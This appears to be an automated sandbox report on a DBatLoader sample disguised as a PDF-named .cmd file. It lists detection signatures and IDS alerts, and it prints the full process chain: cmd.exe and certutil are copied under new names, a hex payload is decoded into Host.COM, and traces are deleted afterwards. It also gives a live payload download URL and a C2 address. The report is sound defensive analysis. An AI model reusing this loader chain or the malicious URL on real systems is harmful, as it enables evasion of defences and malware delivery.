Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
78326473_PDF.cmd

Overview

General Information

Sample name:78326473_PDF.cmd
Analysis ID:1562925
MD5:2152288a44df543c12a71a50df1ed7b6
SHA1:3d9f4c31f2366d2e75b5d6de5eb790da8bf07f1e
SHA256:08eff0bb7bf2a683834cba1a3602e59ab3e803ce18e2998bd944ad06ec0e2736
Tags:cmddoganalecmduser-JAMESWT_MHT
Infos:

Detection

DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
Allocates many large memory junks
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Machine Learning detection for dropped file
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\78326473_PDF.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7780 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7808 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7824 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7856 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7872 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7972 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7988 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • Host.COM (PID: 8004 cmdline: C:\Users\Public\Libraries\Host.COM MD5: 7614CE01178ED3B6E66ECCBB0300FCF8)
    • alpha.exe (PID: 8020 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 8040 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
{"Download Url": ["https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya"]}
SourceRuleDescriptionAuthorStrings
11.2.Host.COM.2aa0000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\78326473_PDF.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7808, ProcessName: alpha.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7808, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7824, ProcessName: extrac32.exe
    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 108.170.55.202, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Host.COM, Initiated: true, ProcessId: 8004, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-26T09:38:13.488731+010020283713Unknown Traffic192.168.2.749703108.170.55.202443TCP
    2024-11-26T09:38:15.373825+010020283713Unknown Traffic192.168.2.749709108.170.55.202443TCP
    2024-11-26T09:38:17.658989+010020283713Unknown Traffic192.168.2.749716108.170.55.202443TCP
    2024-11-26T09:38:19.684214+010020283713Unknown Traffic192.168.2.749722108.170.55.202443TCP
    2024-11-26T09:38:22.202203+010020283713Unknown Traffic192.168.2.749730108.170.55.202443TCP
    2024-11-26T09:38:24.042666+010020283713Unknown Traffic192.168.2.749737108.170.55.202443TCP
    2024-11-26T09:38:26.793550+010020283713Unknown Traffic192.168.2.749746108.170.55.202443TCP
    2024-11-26T09:38:28.718305+010020283713Unknown Traffic192.168.2.749752108.170.55.202443TCP
    2024-11-26T09:38:31.131811+010020283713Unknown Traffic192.168.2.749759108.170.55.202443TCP
    2024-11-26T09:38:33.055290+010020283713Unknown Traffic192.168.2.749765108.170.55.202443TCP
    2024-11-26T09:38:35.392041+010020283713Unknown Traffic192.168.2.749772108.170.55.202443TCP
    2024-11-26T09:38:37.301990+010020283713Unknown Traffic192.168.2.749776108.170.55.202443TCP
    2024-11-26T09:38:39.542893+010020283713Unknown Traffic192.168.2.749783108.170.55.202443TCP
    2024-11-26T09:38:41.373681+010020283713Unknown Traffic192.168.2.749787108.170.55.202443TCP
    2024-11-26T09:38:43.663701+010020283713Unknown Traffic192.168.2.749794108.170.55.202443TCP
    2024-11-26T09:38:45.769416+010020283713Unknown Traffic192.168.2.749799108.170.55.202443TCP
    2024-11-26T09:38:48.052720+010020283713Unknown Traffic192.168.2.749806108.170.55.202443TCP
    2024-11-26T09:38:49.949514+010020283713Unknown Traffic192.168.2.749812108.170.55.202443TCP
    2024-11-26T09:38:52.289192+010020283713Unknown Traffic192.168.2.749819108.170.55.202443TCP
    2024-11-26T09:38:54.212645+010020283713Unknown Traffic192.168.2.749825108.170.55.202443TCP
    2024-11-26T09:38:56.622773+010020283713Unknown Traffic192.168.2.749832108.170.55.202443TCP
    2024-11-26T09:38:58.920053+010020283713Unknown Traffic192.168.2.749838108.170.55.202443TCP
    2024-11-26T09:39:01.454782+010020283713Unknown Traffic192.168.2.749845108.170.55.202443TCP
    2024-11-26T09:39:03.329019+010020283713Unknown Traffic192.168.2.749851108.170.55.202443TCP
    2024-11-26T09:39:05.597669+010020283713Unknown Traffic192.168.2.749858108.170.55.202443TCP
    2024-11-26T09:39:07.526693+010020283713Unknown Traffic192.168.2.749866108.170.55.202443TCP
    2024-11-26T09:39:09.878954+010020283713Unknown Traffic192.168.2.749874108.170.55.202443TCP
    2024-11-26T09:39:11.922607+010020283713Unknown Traffic192.168.2.749879108.170.55.202443TCP
    2024-11-26T09:39:14.318187+010020283713Unknown Traffic192.168.2.749886108.170.55.202443TCP
    2024-11-26T09:39:16.447525+010020283713Unknown Traffic192.168.2.749890108.170.55.202443TCP
    2024-11-26T09:39:18.880685+010020283713Unknown Traffic192.168.2.749899108.170.55.202443TCP
    2024-11-26T09:39:20.770117+010020283713Unknown Traffic192.168.2.749903108.170.55.202443TCP
    2024-11-26T09:39:23.216540+010020283713Unknown Traffic192.168.2.749910108.170.55.202443TCP
    2024-11-26T09:39:25.038371+010020283713Unknown Traffic192.168.2.749916108.170.55.202443TCP
    2024-11-26T09:39:27.364917+010020283713Unknown Traffic192.168.2.749923108.170.55.202443TCP
    2024-11-26T09:39:29.278485+010020283713Unknown Traffic192.168.2.749928108.170.55.202443TCP
    2024-11-26T09:39:31.812672+010020283713Unknown Traffic192.168.2.749936108.170.55.202443TCP
    2024-11-26T09:39:33.729744+010020283713Unknown Traffic192.168.2.749941108.170.55.202443TCP
    2024-11-26T09:39:35.982733+010020283713Unknown Traffic192.168.2.749948108.170.55.202443TCP
    2024-11-26T09:39:37.956949+010020283713Unknown Traffic192.168.2.749952108.170.55.202443TCP
    2024-11-26T09:39:40.240537+010020283713Unknown Traffic192.168.2.749959108.170.55.202443TCP
    2024-11-26T09:39:42.172799+010020283713Unknown Traffic192.168.2.749965108.170.55.202443TCP
    2024-11-26T09:39:44.466544+010020283713Unknown Traffic192.168.2.749972108.170.55.202443TCP
    2024-11-26T09:39:46.407698+010020283713Unknown Traffic192.168.2.749978108.170.55.202443TCP
    2024-11-26T09:39:48.739992+010020283713Unknown Traffic192.168.2.749985108.170.55.202443TCP
    2024-11-26T09:39:50.961356+010020283713Unknown Traffic192.168.2.749991108.170.55.202443TCP
    2024-11-26T09:39:53.255157+010020283713Unknown Traffic192.168.2.749998108.170.55.202443TCP
    2024-11-26T09:39:55.081655+010020283713Unknown Traffic192.168.2.750004108.170.55.202443TCP
    2024-11-26T09:39:57.361369+010020283713Unknown Traffic192.168.2.750011108.170.55.202443TCP
    2024-11-26T09:39:59.231464+010020283713Unknown Traffic192.168.2.750015108.170.55.202443TCP
    2024-11-26T09:40:01.568741+010020283713Unknown Traffic192.168.2.750021108.170.55.202443TCP
    2024-11-26T09:40:03.414641+010020283713Unknown Traffic192.168.2.750025108.170.55.202443TCP
    2024-11-26T09:40:06.069106+010020283713Unknown Traffic192.168.2.750032108.170.55.202443TCP
    2024-11-26T09:40:08.003114+010020283713Unknown Traffic192.168.2.750037108.170.55.202443TCP
    2024-11-26T09:40:10.645305+010020283713Unknown Traffic192.168.2.750044108.170.55.202443TCP
    2024-11-26T09:40:12.532491+010020283713Unknown Traffic192.168.2.750049108.170.55.202443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgiAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/yaAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/KAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyagmAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaCompanAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/pQAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RangesLasAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/rAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/yak_Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/yas_Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/pAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyapQAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyac_Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_OvqqzpvffyaAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifyaaAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifya;Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/cgi-sys/suspendedpage.cgifya9mAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/s_Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya.dllAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgiLocationETagAuthentication-InfoAgeAccept-RAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaUAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaTAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi77Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/k_Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/yapQAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgifyaKAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/h9Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/c_Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya6lAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaFAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/yac_Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/1Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/?Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/;Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_OvqqzpvffyaaAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in:443/MIEJOHNSONERE/190_Ovqqzpvffya9mAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/(Avira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/MIEJOHNSONERE/190_OvqqzpvffyaAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgigi-sys/suspendedpage.cgiAvira URL Cloud: Label: phishing
    Source: https://taksonsdfg.co.inAvira URL Cloud: Label: phishing
    Source: C:\Users\Public\Libraries\Host.COMAvira: detection malicious, Label: HEUR/AGEN.1326062
    Source: 11.0.Host.COM.400000.0.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://taksonsdfg.co.in/MIEJOHNSONERE/190_Ovqqzpvffya"]}
    Source: C:\Users\Public\Libraries\Host.COMReversingLabs: Detection: 68%
    Source: 78326473_PDF.cmdReversingLabs: Detection: 18%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
    Source: C:\Users\Public\Libraries\Host.COMJoe Sandbox ML: detected
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC42C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,7_2_00007FF68AC42C2C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC42F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF68AC42F38
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06C30 NCryptOpenStorageProvider,#360,7_2_00007FF68AD06C30
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC6CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF68AC6CC24
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF68ACD2BC0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD00BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF68AD00BF4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF68ACD0B80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACFCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF68ACFCBB4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC5CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF68AC5CB98
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD00B9C CryptHashData,GetLastError,#357,7_2_00007FF68AD00B9C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD3EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF68AD3EB38
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF68ACD0D14
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF68ACC2CF8
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF68ACD2CFC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06D2C NCryptFreeBuffer,#360,7_2_00007FF68AD06D2C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC92D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68AC92D18
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC94CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF68AC94CC0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD28CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF68AD28CF4
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06CE0 NCryptEnumStorageProviders,#360,7_2_00007FF68AD06CE0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD06C88 NCryptEnumAlgorithms,#360,7_2_00007FF68AD06C88
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF68ACD2C80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD14C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF68AD14C80
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACDACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF68ACDACAC
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACC4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF68ACC4CA0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD08C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF68AD08C58
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC36C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF68AC36C4C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF68ACD0C3C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACBAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF68ACBAA00
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACB4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF68ACB4A34
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF68ACD4A1C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD0A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF68ACD0A18
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD0A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF68AD0A9F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC9E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF68AC9E9F0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AD02994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF68AD02994
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF68AC929A0
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF68ACD099C
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68ACD8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF68ACD8940
